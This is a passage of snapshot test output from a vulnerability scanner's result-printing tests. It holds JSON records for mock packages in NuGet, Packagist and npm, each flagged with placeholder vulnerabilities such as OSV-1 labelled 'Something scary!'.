"Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 }, { "Name": "unknown:/path/to/my/third/lockfile", "Type": "unknown", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null }, { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.3.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 3, "OS": 0, "Project": 3, "Hidden": 0 }, "PackageTypeCount": { "Regular": 3, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 3, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 3 }, "FixableCount": { "Fixed": 0, "UnFixed": 3 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "NuGet", "Sources": [ { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "Packagist", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author1/mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author3/mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "MEDIUM", "SeverityScore": "4.3" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 1, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 1, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 6, "OS": 0, "Project": 6, "Hidden": 0 }, "PackageTypeCount": { "Regular": 4, "Hidden": 0 }, "VulnCount": { "AnalysisCount": { "Regular": 6, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 1, "Low": 0, "Unknown": 5 }, "FixableCount": { "Fixed": 0, "UnFixed": 6 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems,_and_multiple_vulnerabilities,_but_some_uncalled - 1] { "Ecosystems": [ { "Name": "NuGet", "Sources": [ { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "Packagist", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 1 }, "Packages": [ { "Name": "author1/mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 1, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author3/mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "npm", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.2", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false } ], "IsContainerScanning": false, "ImageInfo": { "OS": "", "AllLayers": null, "AllBaseImages": null }, "LicenseSummary": { "Summary": false, "ShowViolations": false, "LicenseCount": null }, "VulnTypeSummary": { "All": 5, "OS": 0, "Project": 5, "Hidden": 1 }, "PackageTypeCount": { "Regular": 4, "Hidden": 1 }, "VulnCount": { "AnalysisCount": { "Regular": 5, "Hidden": 1 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 5 }, "FixableCount": { "Fixed": 0, "UnFixed": 5 } } } --- [TestPrintOutputResults_WithVulnerabilities/multiple_sources_with_a_mixed_count_of_packages_across_ecosystems_using_commits_and_version,_and_multiple_vulnerabilities - 1] { "Ecosystems": [ { "Name": "NuGet", "Sources": [ { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "mine2", "OSPackageNames": [ "" ], "InstalledVersion": "3.2.5", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-2", "GroupIDs": [ "OSV-2" ], "Aliases": null, "Description": "Something less scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 1, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 1 }, "FixableCount": { "Fixed": 0, "UnFixed": 1 } }, "LicenseViolationsCount": 0 } ], "IsOS": false }, { "Name": "Packagist", "Sources": [ { "Name": "lockfile:/path/to/my/first/lockfile", "Type": "lockfile", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author1/mine1", "OSPackageNames": [ "" ], "InstalledVersion": "1.2.3", "Commit": "123abc", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-1", "GroupIDs": [ "OSV-1" ], "Aliases": null, "Description": "Something scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", "command": "", "is_empty": false, "base_image_index": 0 }, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } }, "BaseImageInfo": { "Index": 0, "BaseImageInfo": null, "AllLayers": null, "Count": { "AnalysisCount": { "Regular": 0, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 0 }, "FixableCount": { "Fixed": 0, "UnFixed": 0 } } } }, "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "Licenses": null, "LicenseViolations": null } ], "VulnCount": { "AnalysisCount": { "Regular": 2, "Hidden": 0 }, "SeverityCount": { "Critical": 0, "High": 0, "Medium": 0, "Low": 0, "Unknown": 2 }, "FixableCount": { "Fixed": 0, "UnFixed": 2 } }, "LicenseViolationsCount": 0 }, { "Name": "sbom:/path/to/my/second/lockfile", "Type": "sbom", "PackageTypeCount": { "Regular": 1, "Hidden": 0 }, "Packages": [ { "Name": "author3/mine3", "OSPackageNames": [ "" ], "InstalledVersion": "0.4.1", "Commit": "", "FixedVersion": "No fix available", "RegularVulns": [ { "ID": "OSV-3", "GroupIDs": [ "OSV-3" ], "Aliases": null, "Description": "Something mildly scary!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" }, { "ID": "OSV-5", "GroupIDs": [ "OSV-5" ], "Aliases": null, "Description": "Something scarier!", "IsFixable": false, "FixedVersion": "No fix available", "VulnAnalysisType": 0, "SeverityRating": "UNKNOWN", "SeverityScore": "N/A" } ], "HiddenVulns": [], "LayerDetail": { "LayerIndex": 0, "LayerInfo": { "Index": 0, "LayerMetadata": { "diff_id": "", 